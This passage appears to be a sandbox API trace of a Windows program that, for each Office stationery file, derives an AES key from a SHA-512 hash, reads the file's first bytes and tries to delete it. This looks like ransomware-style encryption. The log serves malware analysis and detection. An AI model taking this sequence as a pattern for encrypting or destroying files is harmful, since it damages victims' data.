lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x11eb [0140.012] ReadFile (in: hFile=0x410, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0140.015] CryptDestroyHash (hHash=0x284d568) returned 1 [0140.015] CryptDestroyKey (hKey=0x284d628) returned 1 [0140.015] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0140.016] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Cave_Drawings.gif" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\cave_drawings.gif")) returned 0 [0140.016] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52568) returned 1 [0140.017] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0140.017] CryptHashData (hHash=0x284d668, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0140.017] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d628) returned 1 [0140.017] GetFileSize (in: hFile=0x40c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x90f [0140.017] ReadFile (in: hFile=0x40c, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0140.019] CryptDestroyHash (hHash=0x284d668) returned 1 [0140.019] CryptDestroyKey (hKey=0x284d628) returned 1 [0140.019] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0140.020] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Connectivity.gif" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\connectivity.gif")) returned 0 [0140.021] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52568) returned 1 [0140.022] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0140.022] CryptHashData (hHash=0x284d568, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0140.022] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d568, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d628) returned 1 [0140.022] GetFileSize (in: hFile=0x410, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xe7 [0140.022] ReadFile (in: hFile=0x410, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0140.023] CryptDestroyHash (hHash=0x284d568) returned 1 [0140.023] CryptDestroyKey (hKey=0x284d628) returned 1 [0140.023] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0140.025] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\garden.htm")) returned 0 [0140.026] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52568) returned 1 [0140.026] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0140.026] CryptHashData (hHash=0x284d668, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0140.026] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d628) returned 1 [0140.026] GetFileSize (in: hFile=0x40c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x5d3f [0140.027] ReadFile (in: hFile=0x40c, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0140.030] CryptDestroyHash (hHash=0x284d668) returned 1 [0140.030] CryptDestroyKey (hKey=0x284d628) returned 1 [0140.030] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0140.031] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\garden.jpg")) returned 0 [0140.032] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52568) returned 1 [0140.033] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0140.033] CryptHashData (hHash=0x284d568, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0140.033] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d568, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d628) returned 1 [0140.033] GetFileSize (in: hFile=0x410, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xed [0140.033] ReadFile (in: hFile=0x410, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0140.035] CryptDestroyHash (hHash=0x284d568) returned 1 [0140.035] CryptDestroyKey (hKey=0x284d628) returned 1 [0140.035] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0140.036] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Green Bubbles.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\green bubbles.htm")) returned 0 [0140.047] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52568) returned 1 [0140.048] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0140.048] CryptHashData (hHash=0x284d668, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0140.048] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d628) returned 1 [0140.048] GetFileSize (in: hFile=0x40c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1906 [0140.048] ReadFile (in: hFile=0x40c, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0140.061] CryptDestroyHash (hHash=0x284d668) returned 1 [0140.061] CryptDestroyKey (hKey=0x284d628) returned 1 [0140.061] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0140.063] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\GreenBubbles.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\greenbubbles.jpg")) returned 0 [0140.064] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52568) returned 1 [0140.064] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0140.064] CryptHashData (hHash=0x284d568, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0140.064] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d568, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d628) returned 1 [0140.064] GetFileSize (in: hFile=0x410, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xeb [0140.064] ReadFile (in: hFile=0x410, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0140.066] CryptDestroyHash (hHash=0x284d568) returned 1 [0140.066] CryptDestroyKey (hKey=0x284d628) returned 1 [0140.066] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0140.120] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Hand Prints.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\hand prints.htm")) returned 0 [0140.121] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52568) returned 1 [0140.121] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0140.121] CryptHashData (hHash=0x284d668, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0140.121] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d628) returned 1 [0140.121] GetFileSize (in: hFile=0x40c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x107e [0140.121] ReadFile (in: hFile=0x40c, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0140.124] CryptDestroyHash (hHash=0x284d668) returned 1 [0140.124] CryptDestroyKey (hKey=0x284d628) returned 1 [0140.124] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0140.125] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\HandPrints.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\handprints.jpg")) returned 0 [0140.126] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52568) returned 1 [0140.127] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0140.127] CryptHashData (hHash=0x284d568, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0140.127] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d568, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d628) returned 1 [0140.127] GetFileSize (in: hFile=0x410, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x8a1 [0140.127] ReadFile (in: hFile=0x410, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0140.137] CryptDestroyHash (hHash=0x284d568) returned 1 [0140.137] CryptDestroyKey (hKey=0x284d628) returned 1 [0140.137] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0140.139] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Monet.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\monet.jpg")) returned 0 [0140.141] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52568) returned 1 [0140.141] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0140.141] CryptHashData (hHash=0x284d668, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0140.141] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d628) returned 1 [0140.141] GetFileSize (in: hFile=0x40c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xb86 [0140.142] ReadFile (in: hFile=0x40c, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0140.144] CryptDestroyHash (hHash=0x284d668) returned 1 [0140.144] CryptDestroyKey (hKey=0x284d628) returned 1 [0140.144] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0140.145] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Notebook.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\notebook.jpg")) returned 0 [0140.145] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52568) returned 1 [0140.146] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0140.146] CryptHashData (hHash=0x284d568, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0140.146] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d568, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d628) returned 1 [0140.146] GetFileSize (in: hFile=0x410, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xed [0140.146] ReadFile (in: hFile=0x410, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0140.147] CryptDestroyHash (hHash=0x284d568) returned 1 [0140.147] CryptDestroyKey (hKey=0x284d628) returned 1 [0140.147] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0140.149] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Orange Circles.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\orange circles.htm")) returned 0 [0140.149] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52568) returned 1 [0140.149] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0140.149] CryptHashData (hHash=0x284d668, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0140.149] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d628) returned 1 [0140.150] GetFileSize (in: hFile=0x40c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x18ed [0140.150] ReadFile (in: hFile=0x40c, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0140.152] CryptDestroyHash (hHash=0x284d668) returned 1 [0140.152] CryptDestroyKey (hKey=0x284d628) returned 1 [0140.152] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0140.153] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\OrangeCircles.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\orangecircles.jpg")) returned 0 [0140.155] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52568) returned 1 [0140.155] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0140.155] CryptHashData (hHash=0x284d568, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0140.155] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d568, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d628) returned 1 [0140.155] GetFileSize (in: hFile=0x410, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xe8 [0140.155] ReadFile (in: hFile=0x410, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0140.157] CryptDestroyHash (hHash=0x284d568) returned 1 [0140.157] CryptDestroyKey (hKey=0x284d628) returned 1 [0140.157] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0140.158] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Peacock.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\peacock.htm")) returned 0 [0140.159] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52568) returned 1 [0140.160] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0140.160] CryptHashData (hHash=0x284d668, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0140.160] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d628) returned 1 [0140.160] GetFileSize (in: hFile=0x40c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x13fb [0140.160] ReadFile (in: hFile=0x40c, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0140.164] CryptDestroyHash (hHash=0x284d668) returned 1 [0140.164] CryptDestroyKey (hKey=0x284d628) returned 1 [0140.164] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0140.165] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Peacock.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\peacock.jpg")) returned 0 [0140.166] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52568) returned 1 [0140.166] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0140.166] CryptHashData (hHash=0x284d568, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0140.166] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d568, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d628) returned 1 [0140.166] GetFileSize (in: hFile=0x410, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xf8d [0140.166] ReadFile (in: hFile=0x410, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0140.168] CryptDestroyHash (hHash=0x284d568) returned 1 [0140.169] CryptDestroyKey (hKey=0x284d628) returned 1 [0140.169] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0140.170] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Pine_Lumber.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\pine_lumber.jpg")) returned 0 [0140.171] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52568) returned 1 [0140.171] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0140.171] CryptHashData (hHash=0x284d668, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0140.171] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d628) returned 1 [0140.171] GetFileSize (in: hFile=0x40c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x13fb [0140.172] ReadFile (in: hFile=0x40c, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0140.175] CryptDestroyHash (hHash=0x284d668) returned 1 [0140.175] CryptDestroyKey (hKey=0x284d628) returned 1 [0140.175] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0140.176] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Pretty_Peacock.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\pretty_peacock.jpg")) returned 0 [0140.177] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52568) returned 1 [0140.178] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0140.178] CryptHashData (hHash=0x284d568, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0140.178] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d568, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d628) returned 1 [0140.178] GetFileSize (in: hFile=0x410, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x36e1 [0140.178] ReadFile (in: hFile=0x410, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0140.184] CryptDestroyHash (hHash=0x284d568) returned 1 [0140.184] CryptDestroyKey (hKey=0x284d628) returned 1 [0140.184] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0140.186] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Psychedelic.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\psychedelic.jpg")) returned 0 [0140.187] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52568) returned 1 [0140.187] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0140.187] CryptHashData (hHash=0x284d668, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0140.187] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d628) returned 1 [0140.187] GetFileSize (in: hFile=0x40c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xe9 [0140.187] ReadFile (in: hFile=0x40c, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0140.189] CryptDestroyHash (hHash=0x284d668) returned 1 [0140.189] CryptDestroyKey (hKey=0x284d628) returned 1 [0140.189] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0140.190] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Roses.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\roses.htm")) returned 0 [0140.191] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52568) returned 1 [0140.191] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0140.192] CryptHashData (hHash=0x284d568, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0140.192] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d568, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d628) returned 1 [0140.192] GetFileSize (in: hFile=0x410, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x780 [0140.192] ReadFile (in: hFile=0x410, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0140.194] CryptDestroyHash (hHash=0x284d568) returned 1 [0140.194] CryptDestroyKey (hKey=0x284d628) returned 1 [0140.194] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0140.195] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Roses.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\roses.jpg")) returned 0 [0140.196] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52568) returned 1 [0140.196] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0140.196] CryptHashData (hHash=0x284d668, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0140.196] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d628) returned 1 [0140.197] GetFileSize (in: hFile=0x40c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x3da0 [0140.197] ReadFile (in: hFile=0x40c, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0140.200] CryptDestroyHash (hHash=0x284d668) returned 1 [0140.200] CryptDestroyKey (hKey=0x284d628) returned 1 [0140.200] CryptReleaseContext 